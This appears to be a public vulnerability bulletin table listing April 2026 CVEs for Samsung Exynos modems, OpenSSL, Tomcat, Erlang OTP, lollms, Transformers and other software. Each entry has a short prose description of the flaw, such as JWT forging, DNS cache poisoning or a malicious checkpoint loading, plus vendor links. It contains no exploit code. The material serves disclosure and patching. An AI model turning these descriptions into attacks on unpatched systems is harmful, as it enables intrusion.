| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in SMS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. A Stack-based Buffer Overflow occurs while parsing SMS RP-DATA messages. | 2026-04-06 | not yet calculated | CVE-2025-54328 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54328/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor amd Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Improper synchronization on a global variable leads to a double free. An attacker can trigger a race condition by invoking an ioctl function concurrently from multiple threads. | 2026-04-06 | not yet calculated | CVE-2025-54601 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54601/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Improper synchronization on a global variable leads to a use-after-free. An attacker can trigger a race condition by invoking an ioctl function concurrently from multiple threads. | 2026-04-06 | not yet calculated | CVE-2025-54602 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54602/ |
| n/a--GenieACS | In GenieACS 1.2.13, an unauthenticated access vulnerability exists in the NBI API endpoint. | 2026-04-07 | not yet calculated | CVE-2025-56015 | https://github.com/genieacs/genieacs/ https://github.com/e1st/CVE-2025-56015 |
| Apache Software Foundation--Apache Airflow | When user logged out, the JWT token the user had authtenticated with was not invalidated, which could lead to reuse of that token in case it was intercepted. In Airflow 3.2 we implemented the mechanism that implements token invalidation at logout. Users who are concerned about the logout scenario and possibility of intercepting the tokens, should upgrade to Airflow 3.2+ Users are recommended to upgrade to version 3.2.0, which fixes this issue. | 2026-04-09 | not yet calculated | CVE-2025-57735 | https://github.com/apache/airflow/pull/61339 https://github.com/apache/airflow/pull/56633 https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98 |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem (Exynos 980, 850, 990, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 1680, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400, and Modem 5410). The absence of proper input validation leads to a Denial of Service. | 2026-04-06 | not yet calculated | CVE-2025-57834 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54328/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in RRC in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Improper memory initialization results in an illegal memory access, causing a system crash via a malformed RRCReconfiguration message. | 2026-04-06 | not yet calculated | CVE-2025-57835 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-57835/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in L2 in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect handling of LTE MAC packets containing many MAC Control Elements (CEs) leads to baseband crashes. | 2026-04-06 | not yet calculated | CVE-2025-58349 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-58349/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in USIM in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Improper handling of SIM card proactive commands leads to a Denial of Service. | 2026-04-06 | not yet calculated | CVE-2025-59440 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-59440/ |
| n/a--n/a | An open redirect in Ascertia SigningHub User v10.0 allows attackers to redirect users to a malicious site via a crafted URL. | 2026-04-06 | not yet calculated | CVE-2025-61166 | https://linkedin.com/in/thakur-nikhil https://medium.com/@rajput.thakur/malicious-open-redirection-cve-2025-61166-bf5d708cd241 |
| Apache Software Foundation--Apache DolphinScheduler | An Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Apache DolphinScheduler. This vulnerability may allow unauthorized actors to access sensitive information, including database credentials. This issue affects Apache DolphinScheduler versions 3.1.*. Users are recommended to upgrade to: * version ≥ 3.2.0 if using 3.1.x As a temporary workaround, users who cannot upgrade immediately may restrict the exposed management endpoints by setting the following environment variable: ``` MANAGEMENT_ENDPOINTS_WEB_EXPOSURE_INCLUDE=health,metrics,prometheus ``` Alternatively, add the following configuration to the application.yaml file: ``` management: endpoints: web: exposure: include: health,metrics,prometheus ``` This issue has been reported as CVE-2023-48796: https://cveprocess.apache.org/cve5/CVE-2023-48796 | 2026-04-09 | not yet calculated | CVE-2025-62188 | https://lists.apache.org/thread/ffrmkcwgr2lcz0f5nnnyswhpn3fytsvo https://www.cve.org/CVERecord?id=CVE-2023-48796 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0. | 2026-04-09 | not yet calculated | CVE-2025-62718 | https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5 https://github.com/axios/axios/pull/10661 https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df https://datatracker.ietf.org/doc/html/rfc1034#section-3.1 https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2 https://github.com/axios/axios/releases/tag/v1.15.0 |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. An out-of-bounds write occurs due to a mismatch between the TP-UDHI and UDL values when processing an SMS TP-UD packet. | 2026-04-07 | not yet calculated | CVE-2025-62818 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-62818/ |
| n/a--LimeSurvey | A Reflected Cross-Site Scripting (XSS) affects LimeSurvey versions prior to 6.15.11+250909, due to the lack of validation of gid parameter in getInstance() function in application/models/QuestionCreate.php. This allows an attacker to craft a malicious URL and compromise the logged in user. | 2026-04-09 | not yet calculated | CVE-2025-63238 | https://github.com/LimeSurvey/LimeSurvey/commit/80769a677dc82ddb1fcced4af19bd959d583208d https://gist.github.com/masquerad3r/f913ab479e8de2ad71987ef98a088fb5 |
| n/a--n/a | An issue in JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to force the infotainment system into accepting falsified GPS signals as legitimate, resulting in the device reporting an incorrect or static location. | 2026-04-07 | not yet calculated | CVE-2025-69515 | http://jxl.com https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main/README.md |
| n/a--n/a | An issue was discovered in Kiamo before 8.4 allowing authenticated administrative attackers to execute arbitrary PHP code on the server. | 2026-04-09 | not yet calculated | CVE-2025-70364 | http://kiamo.com https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md |
| Kiamo[.]com -- Kiamo | A stored cross-site scripting (XSS) vulnerability exists in Kiamo before 8.4 due to improper output encoding of user-supplied input in administrative interfaces. An authenticated administrative user can inject arbitrary JavaScript code that is executed in the browser of users viewing the affected pages. | 2026-04-09 | not yet calculated | CVE-2025-70365 | http://kiamo.com https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70365-Kiamo.md |
| n/a-- Limesurvey | Cross Site Scripting vulnerability in Limesurvey v.6.15.20+251021 allows a remote attacker to execute arbitrary code via the Box[title] and box[url] parameters. | 2026-04-09 | not yet calculated | CVE-2025-70797 | https://gist.github.com/masquerad3r/772ddbfbd9fd95754f4873bcb202146d https://github.com/LimeSurvey/LimeSurvey/pull/4356 |
| n/a--n/a | Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the login function and the authentication mechanism | 2026-04-09 | not yet calculated | CVE-2025-70810 | https://github.com/ariefibis https://www.linkedin.com/in/mohammed-a-6a2548112/ https://gist.github.com/ariefibis/80e306765c23d6fac1584dbb76822e30 |
| n/a--n/a | Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the Admin Control Panel icon management functionality. | 2026-04-09 | not yet calculated | CVE-2025-70811 | https://github.com/ariefibis https://www.linkedin.com/in/mohammed-a-6a2548112/ https://github.com/ariefibis/PHPBB/security/advisories/GHSA-56pv-xg3w-6822 |
| n/a--Yaffa | yaffa v2.0.0 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript into the "Add Account Group" function on the account-group page, allowing execution of arbitrary script in the context of users who view the affected page. | 2026-04-07 | not yet calculated | CVE-2025-70844 | https://github.com/kantorge/yaffa https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70844 |
| n/a--n/a | Dual DHCP DNS Server 8.01 improperly accepts and caches UDP DNS responses without validating that the response originates from a legitimate configured upstream DNS server. The implementation matches responses primarily by TXID and inserts results into the cache, enabling a remote attacker to inject forged responses and poison the DNS cache, potentially redirecting victims to attacker-controlled destinations. | 2026-04-07 | not yet calculated | CVE-2025-71058 | https://sourceforge.net/projects/dhcp-dns-server/ https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-71058 |
| Google--Android | In onHeaderDecoded of LocalImageResolver.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-04-06 | not yet calculated | CVE-2026-0049 | https://source.android.com/docs/security/bulletin/2026/2026-04-01 |
| Pegasystems--Pega Robot Studio | An arbitrary file-write vulnerability in Pega Browser Extension (PBE) affects Pega Robotic Automation version 22.1 or R25 users who are running automations that work with Google Chrome or Microsoft Edge. A bad actor could create a website that includes malicious code. The vulnerability could occur if a Robot Runtime user navigates to the malicious website. | 2026-04-07 | not yet calculated | CVE-2026-1078 | https://support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remediation-note |
| Pegasystems--Pega Browser Extension (PBE) | A native messaging host vulnerability in Pega Browser Extension (PBE) affects users of all versions of Pega Robotic Automation who have installed Pega Browser Extension. A bad actor could create a website that contains malicious code that targets PBE. The vulnerability could occur if a user navigates to this website. The malicious website could then present an unexpected message box. | 2026-04-07 | not yet calculated | CVE-2026-1079 | https://support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remediation-note |
| parisneo--parisneo/lollms | In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the secret key is obtained, the attacker can forge administrative tokens by modifying the JWT payload and resigning it with the cracked secret. This enables unauthorized users to escalate privileges, impersonate the administrator, and gain access to restricted endpoints. The issue is resolved in version 2.2.0. | 2026-04-07 | not yet calculated | CVE-2026-1114 | https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89 https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da63e63a370a6a8ad55fed34 |
| parisneo--parisneo/lollms | A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` function within `backend/routers/social/__init__.py`, where user-provided content is directly assigned to the `DBPost` model without sanitization. This allows attackers to inject and store malicious JavaScript, which is executed in the browsers of users viewing the Home Feed, including administrators. This can lead to account takeover, session hijacking, and wormable attacks. The issue is resolved in version 2.2.0. | 2026-04-10 | not yet calculated | CVE-2026-1115 | https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a |
| parisneo--parisneo/lollms | A Cross-site Scripting (XSS) vulnerability was identified in the `from_dict` method of the `AppLollmsMessage` class in parisneo/lollms prior to version 2.2.0. The vulnerability arises from the lack of sanitization or HTML encoding of the `content` field when deserializing user-provided data. This allows an attacker to inject malicious HTML or JavaScript payloads, which can be executed in the context of another user's browser. Exploitation of this vulnerability can lead to account takeover, session hijacking, or wormable attacks. | 2026-04-12 | not yet calculated | CVE-2026-1116 | https://huntr.com/bounties/d3d076a7-2a51-4e07-8d0e-91e28e76788e https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a |
| parisneo--parisneo/lollms | An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject requests after a period of inactivity and the excessively long default session duration of 31 days. The vulnerability enables an attacker to maintain persistent access to a compromised account, even after the victim resets their password. | 2026-04-08 | not yet calculated | CVE-2026-1163 | https://huntr.com/bounties/abe2d1c4-c21c-4608-8a8e-274565246a8b |
| Python Software Foundation--CPython | CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host. | 2026-04-10 | not yet calculated | CVE-2026-1502 | https://github.com/python/cpython/pull/146212 https://github.com/python/cpython/issues/146211 https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/ https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69 |
| huggingface--huggingface/transformers | A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3. | 2026-04-07 | not yet calculated | CVE-2026-1839 | https://huntr.com/bounties/3c77bb97-e493-493d-9a88-c57f5c536485 https://github.com/huggingface/transformers/commit/03c8082ba4594c9b8d6fe190ca9bed0e5f8ca396 |
| Unknown--Link Whisper Free | The Link Whisper Free WordPress plugin before 0.9.1 has a publicly accessible REST endpoint that allows unauthenticated settings updates. | 2026-04-07 | not yet calculated | CVE-2026-1900 | https://wpscan.com/vulnerability/dc10b627-7981-4c53-bc9d-e87418f3fcfc/ |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01106496; Issue ID: MSV-4467. | 2026-04-07 | not yet calculated | CVE-2026-20431 | https://corp.mediatek.com/product-security-bulletin/April-2026 |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01406170; Issue ID: MSV-4461. | 2026-04-07 | not yet calculated | CVE-2026-20432 | https://corp.mediatek.com/product-security-bulletin/April-2026 |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01088681; Issue ID: MSV-4460. | 2026-04-07 | not yet calculated | CVE-2026-20433 | https://corp.mediatek.com/product-security-bulletin/April-2026 |
| MediaTek, Inc.--MediaTek chipset | In sec boot, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service, if an attacker has physical access to the device, with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09963054; Issue ID: MSV-3899. | 2026-04-07 | not yet calculated | CVE-2026-20446 | https://corp.mediatek.com/product-security-bulletin/April-2026 |
| Rocket.Chat--Rocket.Chat | An open redirect vulnerability in Rocket.Chat versions prior to 8.4.0 allows users to be redirected to arbitrary URLs by manipulating parameters within a SAML endpoint. | 2026-04-10 | not yet calculated | CVE-2026-22560 | https://hackerone.com/reports/3418031 https://github.com/RocketChat/Rocket.Chat/pull/38994 |
| The Wikimedia Foundation--Mediawiki - Wikilove Extension | Improper neutralization of alternate XSS syntax vulnerability in The Wikimedia Foundation Mediawiki - Wikilove Extension allows Cross-Site Scripting (XSS).The issue has been remediated on the `master` branch, and in the release branches for MediaWiki versions 1.43, 1.44, and 1.45. | 2026-04-07 | not yet calculated | CVE-2026-22711 | https://phabricator.wikimedia.org/T416502 https://gerrit.wikimedia.org/r/q/Iab86209478a044504f5a6aea0d8c3d14f21c48b3 |
| OpenPLC_V3--OpenPLC_V3 | OpenPLC_V3 is vulnerable to an Initialization of a Resource with an Insecure Default vulnerability which could allow an attacker to gain access to the system by bypassing authentication via an API. | 2026-04-09 | not yet calculated | CVE-2026-28205 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10 |
| OpenSSL--OpenSSL | Issue summary: Applications using AES-CFB128 encryption or decryption on systems with AVX-512 and VAES support can trigger an out-of-bounds read of up to 15 bytes when processing partial cipher blocks. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application if the input buffer ends at a memory page boundary and the following page is unmapped. There is no information disclosure as the over-read bytes are not written to output. The vulnerable code path is only reached when processing partial blocks (when a previous call left an incomplete block and the current call provides fewer bytes than needed to complete it). Additionally, the input buffer must be positioned at a page boundary with the following page unmapped. CFB mode is not used in TLS/DTLS protocols, which use CBC, GCM, CCM, or ChaCha20-Poly1305 instead. For these reasons the issue was assessed as Low severity according to our Security Policy. Only x86-64 systems with AVX-512 and VAES instruction support are affected. Other architectures and systems without VAES support use different code paths that are not affected. OpenSSL FIPS module in 3.6 version is affected by this issue. | 2026-04-07 | not yet calculated | CVE-2026-28386 | OpenSSL Advisory 3.6.2 git commit |
| OpenSSL--OpenSSL | Issue summary: An uncommon configuration of clients performing DANE TLSA-based server authentication, when paired with uncommon server DANE TLSA records, may result in a use-after-free and/or double-free on the client side. Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code. However, the issue only affects clients that make use of TLSA records with both the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate usage. By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 recommends that clients treat as 'unusable' any TLSA records that have the PKIX certificate usages. These SMTP (or other similar) clients are not vulnerable to this issue. Conversely, any clients that support only the PKIX usages, and ignore the DANE-TA(2) usage are also not vulnerable. The client would also need to be communicating with a server that publishes a TLSA RRset with both types of TLSA records. No FIPS modules are affected by this issue, the problem code is outside the FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-28387 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| OpenSSL--OpenSSL | Issue summary: When a delta CRL that contains a Delta CRL Indicator extension is processed a NULL pointer dereference might happen if the required CRL Number extension is missing. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When CRL processing and delta CRL processing is enabled during X.509 certificate verification, the delta CRL processing does not check whether the CRL Number extension is NULL before dereferencing it. When a malformed delta CRL file is being processed, this parameter can be NULL, causing a NULL pointer dereference. Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the certificate being verified to contain a freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malformed CRL to an application that processes it. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-28388 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| OpenSSL--OpenSSL | Issue summary: During processing of a crafted CMS EnvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-28389 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| OpenSSL--OpenSSL | Issue summary: During processing of a crafted CMS EnvelopedData message with KeyTransportRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the optional parameters field of RSA-OAEP SourceFunc algorithm identifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-28390 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| Japan Computer Emergency Response Team Coordination Center (JPCERT/CC)--Emocheck | Emocheck insecurely loads Dynamic Link Libraries (DLLs). If a crafted DLL file is placed to the same directory, an arbitrary code may be executed with the privilege of the user invoking EmoCheck. | 2026-04-10 | not yet calculated | CVE-2026-28704 | https://www.jpcert.or.jp/press/2026/PR20260410.html https://github.com/JPCERTCC/EmoCheck/ https://jvn.jp/en/jp/JVN00263243/ |
| Erlang--OTP | Incorrect Authorization vulnerability in Erlang OTP (inets modules) allows unauthenticated access to CGI scripts protected by directory rules when served via script_alias. When script_alias maps a URL prefix to a directory outside DocumentRoot, mod_auth evaluates directory-based access controls against the DocumentRoot-relative path while mod_cgi executes the script at the ScriptAlias-resolved path. This path mismatch allows unauthenticated access to CGI scripts that directory rules were meant to protect. This vulnerability is associated with program files lib/inets/src/http_server/mod_alias.erl, lib/inets/src/http_server/mod_auth.erl, and lib/inets/src/http_server/mod_cgi.erl. This issue affects OTP from OTP 17.0 until OTP 28.4.2, 27.3.4.10 and 26.2.5.19 corresponding to inets from 5.10 until 9.6.2, 9.3.2.4 and 9.1.0.6. | 2026-04-07 | not yet calculated | CVE-2026-28808 | https://github.com/erlang/otp/security/advisories/GHSA-3vhp-h532-mc3f https://cna.erlef.org/cves/CVE-2026-28808.html https://osv.dev/vulnerability/EEF-CVE-2026-28808 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/8fc71ac6af4fbcc54103bec2983ef22e82942688 https://github.com/erlang/otp/commit/9dfa0c51eac97866078e808dec2183cb7871ff7c |
| Erlang--OTP | Generation of Predictable Numbers or Identifiers vulnerability in Erlang/OTP kernel (inet_res, inet_db modules) allows DNS Cache Poisoning. The built-in DNS resolver (inet_res) uses a sequential, process-global 16-bit transaction ID for UDP queries and does not implement source port randomization. Response validation relies almost entirely on this ID, making DNS cache poisoning practical for an attacker who can observe one query or predict the next ID. This conflicts with RFC 5452 recommendations for mitigating forged DNS answers. inet_res is intended for use in trusted network environments and with trusted recursive resolvers. Earlier documentation did not clearly state this deployment assumption, which could lead users to deploy the resolver in environments where spoofed DNS responses are possible. This vulnerability is associated with program files lib/kernel/src/inet_db.erl and lib/kernel/src/inet_res.erl. This issue affects OTP from OTP 17.0 until OTP 28.4.2, 27.3.4.10 and 26.2.5.19 corresponding to kernel from 3.0 until 10.6.2, 10.2.7.4 and 9.2.4.11. | 2026-04-07 | not yet calculated | CVE-2026-28810 | https://github.com/erlang/otp/security/advisories/GHSA-v884-5jg5-whj8 https://cna.erlef.org/cves/CVE-2026-28810.html https://osv.dev/vulnerability/EEF-CVE-2026-28810 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/36f23c9d2cc54afe83671dd7343596d7972839a5 https://github.com/erlang/otp/commit/dd15e8eb03548c5e55e9915f0e91389ec6bad9fd https://github.com/erlang/otp/commit/b057a9d995017b1be50d6dc02edd52382f3231b8 |
| Apache Software Foundation--Apache Tomcat | Configured cipher preference order not preserved vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.16 through 11.0.18, from 10.1.51 through 10.1.52, from 9.0.114 through 9.0.115. Users are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-29129 | https://lists.apache.org/thread/r4h1t6f8xhxsxfm6c2z5cprolsosho3f |
| Apache Software Foundation--Apache Tomcat | CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled vulnerability in Apache Tomcat, Apache Tomcat Native. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.1.0-M7 through 10.1.52, from 9.0.83 through 9.0.115; Apache Tomcat Native: from 1.1.23 through 1.1.34, from 1.2.0 through 1.2.39, from 1.3.0 through 1.3.6, from 2.0.0 through 2.0.13. Users are recommended to upgrade to version Tomcat Native 1.3.7 or 2.0.14 and Tomcat 11.0.20, 10.1.53 and 9.0.116, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-29145 | https://lists.apache.org/thread/yz5fxmhd2j43wgqykssdo7kltws57jfz |
| Apache Software Foundation--Apache Tomcat | Padding Oracle vulnerability in Apache Tomcat's EncryptInterceptor with default configuration. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9..115, from 8.5.38 through 8.5.100, from 7.0.100 through 7.0.109. Users are recommended to upgrade to version 11.0.19, 10.1.53 and 9.0.116, which fixes the issue. | 2026-04-09 | not yet calculated | CVE-2026-29146 | https://lists.apache.org/thread/lzt04z2pb3dc5tk85obn80xygw3z1p0w |
| n/a--n/a | PHP-MYSQL-User-Login-System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at login.php. | 2026-04-10 | not yet calculated | CVE-2026-29861 | https://github.com/amanyadav78/CVE-2026-29861 |
| Entechtaiwan[.]com – PowerStrip | The pstrip64.sys driver in EnTech Taiwan PowerStrip <=3.90.736 allows local users to escalate privileges to SYSTEM via a crafted IOCTL request enabling unprivileged users to map arbitrary physical memory into their address space and modify critical kernel structures. | 2026-04-09 | not yet calculated | CVE-2026-29923 | https://entechtaiwan.com/util/ps.shtm https://packetstorm.news/files/id/218394/ |
| n/a-- OpenAirInterface | OpenAirInterface Version 2.2.0 has a Buffer Overflow vulnerability in processing UplinkNASTransport containing Authentication Response containing a NAS PDU with oversize response (For example 100 byte). The response is decoded by AMF and passed to the AUSF component for verification. AUSF crashes on receiving this oversize response. This can prohibit users from further registration and verification and can cause Denial of Services (DoS). | 2026-04-08 | not yet calculated | CVE-2026-30075 | https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show=eyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6 |
| n/a-- OpenAirInterface | OpenAirInterface V2.2.0 AMF crashes when it receives an NGAP message with invalid procedure code or invalid PDU-type. For example when the message specification requires InitiatingMessage but sent with successfulOutcome. | 2026-04-06 | not yet calculated | CVE-2026-30078 | https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/74 https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/merge_requests/414 |
